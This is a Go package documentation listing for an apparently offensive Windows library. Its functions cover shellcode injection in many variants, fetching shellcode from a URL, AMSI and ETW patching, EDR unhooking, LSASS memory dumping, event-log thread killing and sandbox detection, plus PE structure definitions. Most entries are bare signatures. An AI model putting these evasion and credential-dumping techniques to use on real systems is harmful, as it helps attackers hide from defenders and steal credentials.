core

Published: Oct 18, 2023 License: MIT Imports: 24 Imported by: 0


Constants

// Memory allocation and page-protection flags passed to the Windows memory
// management APIs (see VirtualAlloc and VirtualProtect in this package).
// The names and values are the ones defined in the Windows SDK, so they can
// be used interchangeably with the golang.org/x/sys/windows constants of the
// same name.
const (
	MEM_COMMIT        = 0x1000 // commit pages of a reserved region
	MEM_RESERVE       = 0x2000 // reserve an address range without committing it
	PAGE_EXECUTE_READ = 0x20   // pages are executable and readable, not writable
	PAGE_READWRITE    = 0x04   // pages are readable and writable, not executable
)
// IDX is an index/offset constant used elsewhere in the package; its meaning
// is not visible from this declaration alone — check the call sites before
// changing it.
const IDX = 32

Variables

// HookCheck is the four-byte pattern (0x4c 0x8b 0xd1 0xb8) that the
// hook-detection helpers compare a function prologue against; presumably it
// is the expected unmodified prologue and a mismatch is reported as a hook —
// confirm against IsHooked/DetectHooks. It is an exported, mutable
// package-level slice: callers must treat it as read-only.
var HookCheck = []byte("\x4c\x8b\xd1\xb8")

Functions

func AutoCheck

func AutoCheck() error

func BlockHandle

func BlockHandle() error

func CalcShellcode

func CalcShellcode() []byte

func CheckBytes

func CheckBytes(b []byte) (uint16, error)

func CheckCpu

func CheckCpu() bool

func CheckDisk

func CheckDisk() (bool, error)

func CheckDrivers

func CheckDrivers() bool

func CheckHighPrivs

func CheckHighPrivs() (bool, error)

func CheckHostname

func CheckHostname() (bool, error)

func CheckInternet

func CheckInternet() bool

func CheckMemory

func CheckMemory() (bool, error)

func CheckProcess

func CheckProcess() (bool, error)

func CheckUsername

func CheckUsername() (bool, error)

func ClassicUnhook

func ClassicUnhook(funcnames []string, dllpath string) error

This function unhooks the given functions of the specified DLL.

func ConvertBytes

func ConvertBytes(dllBytes, functionHash, userData []byte) []byte

func ConvertDllBytesToShellcode

func ConvertDllBytesToShellcode(dll_bytes []byte, func_name string, data string) ([]byte, error)

func ConvertDllToShellcode

func ConvertDllToShellcode(dll_file string, func_name string, data string) ([]byte, error)

func ConvertStringSecurityDescriptorToSecurityDescriptorW

func ConvertStringSecurityDescriptorToSecurityDescriptorW(p1 uintptr, p2 uintptr, p3 uintptr, p4 uintptr) error

func CreateProcess

func CreateProcess(shellcode []byte, pid int) error

func CreateRemoteThread

func CreateRemoteThread(shellcode []byte, pid int) error

func CreateRemoteThreadHalos

func CreateRemoteThreadHalos(shellcode []byte) error

func DetectHooks

func DetectHooks() ([]string, error)

func DumpLsass

func DumpLsass(output string) error

func ElevateProcessToken

func ElevateProcessToken() error

Enable SeDebugPrivilege

func EnableACG

func EnableACG() error

func EnumSystemLocales

func EnumSystemLocales(shellcode []byte) error

func EnumSystemLocalesHalos

func EnumSystemLocalesHalos(shellcode []byte) error

func EtwpCreateEtwThread

func EtwpCreateEtwThread(shellcode []byte) error

func Execute

func Execute(shellcode []byte) error

func Fibers

func Fibers(shellcode []byte) error

func FullUnhook

func FullUnhook(dllpath string) error

Load fresh DLL copy in memory

func FuncFromHash

func FuncFromHash(hash string, dll string, hashing_func func(str string) string) (uint16, string, error)

Check if hash is a valid function and return its proc

func GetEventLogPid

func GetEventLogPid() (uint32, error)

func GetFuncPtr

func GetFuncPtr(funcname string) (uint64, error)

func GetNtdllStart

func GetNtdllStart() (start uintptr, size uintptr)

func GetShellcodeFromFile

func GetShellcodeFromFile(file string) ([]byte, error)

func GetShellcodeFromUrl

func GetShellcodeFromUrl(sc_url string) ([]byte, error)

func GetSysId

func GetSysId(funcname string) (uint16, error)

Returns the syscall number read from memory; if that fails, it tries to obtain the syscall number from disk.

func HalosFuncFromHash

func HalosFuncFromHash(hash string, hashing_func func(str string) string) (uint16, string, error)

func Inject

func Inject(shellcode []byte, technique string, pid int) error

func IsHooked

func IsHooked(funcname string) (bool, error)

func PatchAmsi

func PatchAmsi() error

func PatchEtw

func PatchEtw() error

func PatchUnhook

func PatchUnhook(func_to_unhook string) error

Write to function address: 0x90, 0x90, 0x4c, 0x8b, 0xd1, 0xb8, 0xc1, 0x00, 0x00, 0x00, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90

func PerunsUnhook

func PerunsUnhook() error

func Phant0m

func Phant0m(eventlog_pid uint32) error

Recommended function

func Phant0mWithOutput

func Phant0mWithOutput(eventlog_pid uint32) error

This function does the same but also prints the thread IDs.

func QueueUserApc

func QueueUserApc(shellcode []byte) error

func RandomInt

func RandomInt(max int, min int) int

Generates a random integer within the given range.

func RandomString

func RandomString(length int) string

func RtlCreateUserThread

func RtlCreateUserThread(shellcode []byte, pid int) error

func StrToSha1

func StrToSha1(str string) string

Convert string to Sha1 (used for hashing)

func Syscall

func Syscall(callid uint16, argh ...uintptr) (errcode uint32, err error)

Receives function address and arguments

func UuidFromString

func UuidFromString(shellcode []byte) error

func VirtualAlloc

func VirtualAlloc(handle uintptr, zero uintptr, regionsize uintptr, allocType uintptr, allocProtection uintptr) (uintptr, error)

addr, err := VirtualAlloc(pHandle, 0, uintptr(len(shellcode)), windows.MEM_COMMIT | windows.MEM_RESERVE, windows.PAGE_READWRITE)

func VirtualProtect

func VirtualProtect(pHandle uintptr, addr uintptr, regionsize uintptr, newProtect uintptr, oldProtect uintptr) error

err := VirtualProtect(pHandle, &addr, uintptr(len(shellcode)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect)))

func WriteBytes

func WriteBytes(module string, proc string, data *[]byte) error

func WriteMemory

func WriteMemory(inbuf []byte, destination uintptr)

func WriteProcessMemory

func WriteProcessMemory(pHandle uintptr, addr uintptr, buffer uintptr, buffer_len uintptr) error

err := WriteProcessMemory(pHandle, addr, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))

Types

type CLIENT_ID

// CLIENT_ID mirrors the native CLIENT_ID structure: a process identifier and
// a thread identifier, both carried as pointer-sized integers (the native
// definition types them as HANDLE). ClientID in this package holds the same
// pair as windows.Handle values; the two types are not interchangeable
// without conversion.
type CLIENT_ID struct {
	UniqueProcess uintptr // process identifier
	UniqueThread  uintptr // thread identifier
}

type ClientID

// ClientID is a second mirror of the native CLIENT_ID structure, using
// windows.Handle for both fields. It duplicates CLIENT_ID above with a
// different field type; which one a given call expects is not visible here,
// so check the call site.
type ClientID struct {
	UniqueProcess windows.Handle // process identifier
	UniqueThread  windows.Handle // thread identifier
}

type Export

// Export describes one symbol exported by a module: its name and an address.
// Whether VirtualAddress is a relative virtual address or an absolute one is
// not visible from this declaration — confirm against the code that fills it.
type Export struct {
	Name           string  // exported symbol name
	VirtualAddress uintptr // address of the symbol (RVA or absolute; see above)
}

type IMAGE_DATA_DIRECTORY

// IMAGE_DATA_DIRECTORY is one entry of the optional header's data directory
// table (export table, import table, ...): the RVA of the table and its size
// in bytes. Layout matches winnt.h (two 32-bit fields, 8 bytes).
type IMAGE_DATA_DIRECTORY struct {
	VirtualAddress uint32 // RVA of the directory's data
	Size           uint32 // size of the directory's data in bytes
}

type IMAGE_DOS_HEADER

// IMAGE_DOS_HEADER mirrors the legacy DOS header at the start of every PE
// image. The field that matters for PE parsing is E_lfanew, the file offset
// of the IMAGE_NT_HEADER.
type IMAGE_DOS_HEADER struct {
	E_magic    uint16     // Magic number
	E_cblp     uint16     // Bytes on last page of file
	E_cp       uint16     // Pages in file
	E_crlc     uint16     // Relocations
	E_cparhdr  uint16     // Size of header in paragraphs
	E_minalloc uint16     // Minimum extra paragraphs needed
	E_maxalloc uint16     // Maximum extra paragraphs needed
	E_ss       uint16     // Initial (relative) SS value
	E_sp       uint16     // Initial SP value
	E_csum     uint16     // Checksum
	E_ip       uint16     // Initial IP value
	E_cs       uint16     // Initial (relative) CS value
	E_lfarlc   uint16     // File address of relocation table
	E_ovno     uint16     // Overlay number
	E_res      [4]uint16  // Reserved words
	E_oemid    uint16     // OEM identifier (for E_oeminfo)
	E_oeminfo  uint16     // OEM information; E_oemid specific
	E_res2     [10]uint16 // Reserved words
	// NOTE(review): in winnt.h e_lfanew is a 32-bit LONG; declared as uint16
	// this struct is 62 bytes rather than the native 64, so any code that
	// overlays it on raw image memory should be checked for offset handling.
	E_lfanew   uint16     // File address of new exe header
}

type IMAGE_FILE_HEADER

// IMAGE_FILE_HEADER is the COFF file header that follows the PE signature.
// Layout matches winnt.h (20 bytes).
type IMAGE_FILE_HEADER struct {
	Machine              uint16 // target machine type (IMAGE_FILE_MACHINE_*)
	NumberOfSections     uint16 // number of section headers following the optional header
	TimeDateStamp        uint32 // link time as a Unix timestamp
	PointerToSymbolTable uint32 // file offset of the COFF symbol table (0 if none)
	NumberOfSymbols      uint32 // number of entries in the COFF symbol table
	SizeOfOptionalHeader uint16 // size in bytes of the optional header that follows
	Characteristics      uint16 // IMAGE_FILE_* attribute flags
}

type IMAGE_NT_HEADER

// IMAGE_NT_HEADER is the PE header located at IMAGE_DOS_HEADER.E_lfanew.
// Because OptionalHeader is the 64-bit IMAGE_OPTIONAL_HEADER, this type
// matches the PE32+ (64-bit) layout only.
type IMAGE_NT_HEADER struct {
	Signature      uint32                // "PE\0\0"
	FileHeader     IMAGE_FILE_HEADER     // COFF header
	OptionalHeader IMAGE_OPTIONAL_HEADER // PE32+ optional header
}

type IMAGE_OPTIONAL_HEADER

// IMAGE_OPTIONAL_HEADER is the PE32+ (64-bit) optional header: ImageBase and
// the stack/heap reserve and commit sizes are 64-bit and there is no
// BaseOfData field, which is what distinguishes it from the PE32 layout.
// Field order and widths match winnt.h's IMAGE_OPTIONAL_HEADER64.
type IMAGE_OPTIONAL_HEADER struct {
	Magic                       uint16 // 0x20b for PE32+
	MajorLinkerVersion          uint8
	MinorLinkerVersion          uint8
	SizeOfCode                  uint32
	SizeOfInitializedData       uint32
	SizeOfUninitializedData     uint32
	AddressOfEntryPoint         uint32 // RVA of the entry point
	BaseOfCode                  uint32
	ImageBase                   uint64 // preferred load address
	SectionAlignment            uint32
	FileAlignment               uint32
	MajorOperatingSystemVersion uint16
	MinorOperatingSystemVersion uint16
	MajorImageVersion           uint16
	MinorImageVersion           uint16
	MajorSubsystemVersion       uint16
	MinorSubsystemVersion       uint16
	Win32VersionValue           uint32
	SizeOfImage                 uint32 // size of the mapped image, including headers
	SizeOfHeaders               uint32
	CheckSum                    uint32
	Subsystem                   uint16
	DllCharacteristics          uint16 // IMAGE_DLLCHARACTERISTICS_* flags (ASLR, DEP, CFG, ...)
	SizeOfStackReserve          uint64
	SizeOfStackCommit           uint64
	SizeOfHeapReserve           uint64
	SizeOfHeapCommit            uint64
	LoaderFlags                 uint32
	NumberOfRvaAndSizes         uint32 // number of valid DataDirectory entries
	DataDirectory               [16]IMAGE_DATA_DIRECTORY // indexed by IMAGE_DIRECTORY_ENTRY_*
}

type IMAGE_OPTIONAL_HEADER32

// IMAGE_OPTIONAL_HEADER32 is intended as the PE32 (32-bit) optional header.
//
// NOTE(review): only BaseOfData differs from the 64-bit type above. In
// winnt.h the PE32 variant also narrows ImageBase, SizeOfStackReserve,
// SizeOfStackCommit, SizeOfHeapReserve and SizeOfHeapCommit to 32 bits, and
// DataDirectory is an array of IMAGE_DATA_DIRECTORY rather than a single
// pointer-sized value. As declared, this struct's size and field offsets do
// not match a native 32-bit optional header; confirm how it is consumed
// before relying on it for parsing.
type IMAGE_OPTIONAL_HEADER32 struct {
	Magic                       uint16 // 0x10b for PE32
	MajorLinkerVersion          byte
	MinorLinkerVersion          byte
	SizeOfCode                  uint32
	SizeOfInitializedData       uint32
	SizeOfUninitializedData     uint32
	AddressOfEntryPoint         uint32
	BaseOfCode                  uint32
	BaseOfData                  uint32 // Different from 64 bit header
	ImageBase                   uint64 // 32-bit in the native PE32 header (see note above)
	SectionAlignment            uint32
	FileAlignment               uint32
	MajorOperatingSystemVersion uint16
	MinorOperatingSystemVersion uint16
	MajorImageVersion           uint16
	MinorImageVersion           uint16
	MajorSubsystemVersion       uint16
	MinorSubsystemVersion       uint16
	Win32VersionValue           uint32
	SizeOfImage                 uint32
	SizeOfHeaders               uint32
	CheckSum                    uint32
	Subsystem                   uint16
	DllCharacteristics          uint16
	SizeOfStackReserve          uint64 // 32-bit in the native PE32 header
	SizeOfStackCommit           uint64 // 32-bit in the native PE32 header
	SizeOfHeapReserve           uint64 // 32-bit in the native PE32 header
	SizeOfHeapCommit            uint64 // 32-bit in the native PE32 header
	LoaderFlags                 uint32
	NumberOfRvaAndSizes         uint32
	DataDirectory               uintptr // native: [16]IMAGE_DATA_DIRECTORY
}

type IMAGE_OPTIONAL_HEADER64

// IMAGE_OPTIONAL_HEADER64 is a distinct named type with the same underlying
// layout as IMAGE_OPTIONAL_HEADER (it is a type definition, not an alias).
// IMAGE_NT_HEADER embeds IMAGE_OPTIONAL_HEADER, so a value of this type must
// be converted explicitly before being assigned there.
type IMAGE_OPTIONAL_HEADER64 IMAGE_OPTIONAL_HEADER

type MayBeHookedError

// MayBeHookedError is the error type reported when a function prologue does
// not match the bytes expected of an unmodified stub. Foundbytes holds the
// bytes that were actually read, so a caller can log or inspect them with
// errors.As. Exactly which routines return it is not visible here.
type MayBeHookedError struct {
	Foundbytes []byte // prologue bytes observed at the checked address
}

func (MayBeHookedError) Error

func (e MayBeHookedError) Error() string

type PEB

// PEB is a partial Go mirror of the native Process Environment Block. This
// listing omits the struct's unexported fields, so the per-field offset notes
// below cannot be verified from what is shown and should be checked against
// the native layout (note that Go inserts alignment padding before the first
// uintptr field on 64-bit targets).
type PEB struct {
	InheritedAddressSpace    byte // BYTE	0
	ReadImageFileExecOptions byte // BYTE	1
	BeingDebugged            byte // BYTE	2 — set by the kernel while a debugger is attached

	Mutant            uintptr // BYTE 4 (offset not confirmed; see type comment)
	ImageBaseAddress  uintptr // BYTE 8 — base address of the process image
	Ldr               uintptr // PPEB_LDR_DATA — loader data, holds the loaded-module lists
	ProcessParameters uintptr // PRTL_USER_PROCESS_PARAMETERS

	AtlThunkSListPtr uintptr // PVOID

	AtlThunkSListPtr32 uint32 // ULONG

	PostProcessInitRoutine uintptr // PPS_POST_PROCESS_INIT_ROUTINE

	SessionId uint32 // ULONG
	// contains filtered or unexported fields
}

type PROCESS_BASIC_INFORMATION

// PROCESS_BASIC_INFORMATION is the structure filled by
// NtQueryInformationProcess for the ProcessBasicInformation class. Only the
// exported fields are shown; the listing omits the rest, so the visible
// offsets are not the full layout.
type PROCESS_BASIC_INFORMATION struct {
	PebBaseAddress uintptr // PPEB — address of the process's PEB

	UniqueProcessId              uintptr // ULONG_PTR — process id
	InheritedFromUniqueProcessID uintptr // PVOID — parent process id
	// contains filtered or unexported fields
}

https://github.com/elastic/go-windows/blob/master/ntdll.go#L77

type PROCESS_MITIGATION_DYNAMIC_CODE_POLICY

// PROCESS_MITIGATION_DYNAMIC_CODE_POLICY mirrors the Arbitrary Code Guard
// policy structure used with SetProcessMitigationPolicy. In the native
// definition the 32-bit word is a bitfield (ProhibitDynamicCode is bit 0,
// followed by AllowThreadOptOut, AllowRemoteDowngrade, AuditProhibitDynamicCode);
// here the whole flags word is exposed as a single field, so callers set
// individual bits themselves. Presumably consumed by EnableACG — confirm.
type PROCESS_MITIGATION_DYNAMIC_CODE_POLICY struct {
	ProhibitDynamicCode uint32 // flags word; bit 0 prohibits creating executable dynamic code
}

type PTHREAD_BASIC_INFORMATION

// PTHREAD_BASIC_INFORMATION mirrors part of the native THREAD_BASIC_INFORMATION
// structure (despite the P prefix this is the struct, not a pointer to it).
// Only the exported fields are shown; unexported ones are omitted from this
// listing.
//
// NOTE(review): Priority and BasePriority are declared as Go int, which is
// 64-bit on amd64, whereas the native KPRIORITY is a 32-bit LONG — confirm
// the intended layout before overlaying this struct on a native buffer.
type PTHREAD_BASIC_INFORMATION struct {
	AffinityMask uintptr // KAFFINITY — processor affinity mask
	Priority     int     // KPRIORITY in the native struct (see note above)
	BasePriority int     // KPRIORITY in the native struct (see note above)
	// contains filtered or unexported fields
}

type SC_SERVICE_TAG_QUERY

// SC_SERVICE_TAG_QUERY mirrors the undocumented service-tag query structure
// used with the service control manager's tag lookup. All of its fields are
// unexported, so none are visible in this listing; it cannot be populated
// from outside the package.
type SC_SERVICE_TAG_QUERY struct {
	// contains filtered or unexported fields
}
